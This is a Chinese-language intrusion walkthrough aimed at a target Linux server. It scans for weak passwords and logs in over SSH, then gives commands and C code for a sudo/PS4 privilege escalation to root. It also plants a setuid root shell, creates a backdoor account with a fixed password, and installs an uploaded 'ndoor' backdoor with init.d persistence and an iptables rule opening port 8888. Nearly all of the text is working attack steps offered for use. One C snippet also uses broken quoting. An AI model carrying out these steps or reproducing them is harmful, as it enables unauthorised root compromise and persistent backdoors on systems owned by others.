1.先拿X-scan等软件去扫描需要攻击的linux系统看看有没有弱口令
2.如果扫到的话使用putty工具来进行ssh远程登录
3.然后我们开始提权
cat > ex.sh << _EOF
#! /bin/bash
echo
_EOF
cat > ex.c << _EOF
#include<stdio.h>
int main(void) {
setuid(0);
system("/bin/sh");
return(0);
}
_EOF
chmod u+x ex.sh
gcc -o ex ex.c
setenv SHELLIOPTS xtrace
setenv PS4 '$(chown root:root;chmod u+s ex)'
sudo ./ex.sh
./ex
到此已到达ROOT权限
-------------------------------------------------------------------------------------------------------
PS:普通用户必须有sudo的权限...否则起不来
4.创建自己的用户并给与root权限
cd /bin
cat >snow.c << _EOF
#include<stdio.h>
int main (void) {
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
system('/bin/sh');
return(0);
}
_EOF
gcc -o snow snow.c
chmod 4755 snow
/usr/sbin/useradd -d /tmp -s /bin/snow snow
echo '111111' | passwd --stdin snow
到这后,linux已经成功提权(自己创建的账号(snow))
--------------------------------------------------------------------------------------------------------------------
然后使用ftp工具将后门程序传上去(我手里用的是ndoor.bz2 使用命令(put ndoor.bz2))
上传上去后使用解压命令解压bunzip2 ndoor.bz2
解压完成后,提升该文件的权限chmod 755 ndoor
更改文件的所有者 chown root:root ndoor
把这个文件移动到/bin下 mv ndoor
然后做一个启动项 cat > /etc/init.d/syssnow << _EOF
case "\$1" in
[ -x /bin/ndoor ] && /bin/ndoor
esac
_EOF
完成后,给与相应的权限和用户设置
chown root:root syssnow
chmod 755 syssnow
然后将文件做两个链接
ln -s /etc/init.d/syssnow /etc/rc.d/rc3.d/S98syssnow
ln -s /etc/init.d/syssnow /etc/rc.d/rc5.d/S98syssnow
完成后输入命令 /etc/init.d/syssnow start 打开后门
然后查看端口号
netstat -anp | grep ndoor 端口是8888 得到后使用将这条命令写入防火墙的访问控制列表中
/sbin/iptables -I INPUT -m tcp -p tcp --dport 8888 -j ACCEPT
/etc/init.d/iptables save
